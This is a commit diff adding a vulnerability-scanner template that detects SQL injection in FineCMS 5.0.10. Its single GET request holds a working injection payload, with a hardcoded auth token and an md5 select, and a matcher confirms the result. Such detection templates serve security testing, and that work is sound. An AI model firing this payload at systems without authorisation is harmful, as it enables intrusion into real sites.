commit
482525c17a
|
@ -0,0 +1,22 @@
|
|||
id: finecms-sqli
|
||||
|
||||
info:
|
||||
name: FineCMS 5.0.10 - SQL Injection
|
||||
author: ritikchaddha
|
||||
severity: high
|
||||
description: |
|
||||
SQL Injection exists in FineCMS 5.0.10.
|
||||
reference:
|
||||
- https://blog.csdn.net/dfdhxb995397/article/details/101385340
|
||||
tags: finecms,sqli
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?c=api&m=data2&auth=582f27d140497a9d8f048ca085b111df¶m=action=sql%20sql=%27select%20md5({{randstr}})%27"
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- '{{md5("{{randstr}}")}}'
|
Loading…
Reference in New Issue